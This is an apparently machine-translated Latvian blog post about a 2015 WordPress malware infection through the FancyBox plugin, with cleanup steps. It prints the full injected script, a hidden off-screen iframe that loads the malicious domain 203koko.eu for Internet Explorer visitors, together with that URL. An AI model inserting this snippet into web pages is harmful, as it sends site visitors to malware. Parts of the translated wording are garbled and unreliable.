[Ļaunprātīga programmatūra iframe 203koko] Vietnes WordPress Inficēta ļaunprātīga programmatūra

Agrāk šajā nedēļā vairākas mājas lapas un blogus WordPress, saņēma brīdinājumus no malware infekcijas cauri Google Webmasters.

Problēma, uz kuru Google Webmasters minēts, ir klātbūtne menca / scenārijs iframe ļaundabīgo programmu avota tīmekļa vietnes.

<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>

Šķiet, ka tas ir ievainojamība a iespraustacquis FancyBox priekš WordPress kas līdz vakar (05.02.2015) nebija atjaunināti uz ilgu laiku.
Atrisināt šo problēmu un vīrusus vietnes dezinficēšanai ar šo ļaundabīgo programmu, ir samērā vienkāršs.
1. Atspējojiet FancyBox spraudni.
2. Dzēst visus FancyBox spraudņu failus no servera (izmantojot FTP)
3. Instalējiet jauno spraudņa versiju (Fancybox 3.0.4)

FancyBox priekš WordPress 3.0.4

- Pārdēvēts iestatījums, kuru ietekmēja 3.0.3. norādītā drošības problēma. Tam vajadzētu apturēt ļaunprātīgā koda parādīšanos vietnēs, kurās atrodas spraudnis updated, nenoņemot ļaunprātīgo kodu.

FancyBox priekš WordPress 3.0.3

Fiksētie drošības jautājums.

Malware informācija: 

TYPE: iFrame novirzīšana
TARGET: WordPress fancybox
ĻAUNPRĀTĪGU PROGRAMMATŪRU domēns: 203koko.eu
ĻAUNPRĀTĪGU PROGRAMMATŪRU URI: http://203koko.eu/hjnfh/ipframe2.php
Ļaunprātīga programmatūra RAW KODI:
RAKSTISKĀ APRAKSTS: if (navigator.userAgent.match(/msie/i)) { document.write(‘

Noņemiet ļaunprātīgu programmatūru no sava WordPress mājas lapa.

Dibinātājs un redaktors Stealth Settings, no 2006. gada līdz mūsdienām. Pieredze darbā ar operētājsistēmām Linux (Īpaši CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (SPS).

Leave a Comment